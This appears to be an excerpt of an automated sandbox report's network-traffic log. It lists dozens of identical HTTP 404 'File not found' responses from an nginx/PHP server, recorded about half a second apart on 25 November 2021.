        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:49 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:49 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:52:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
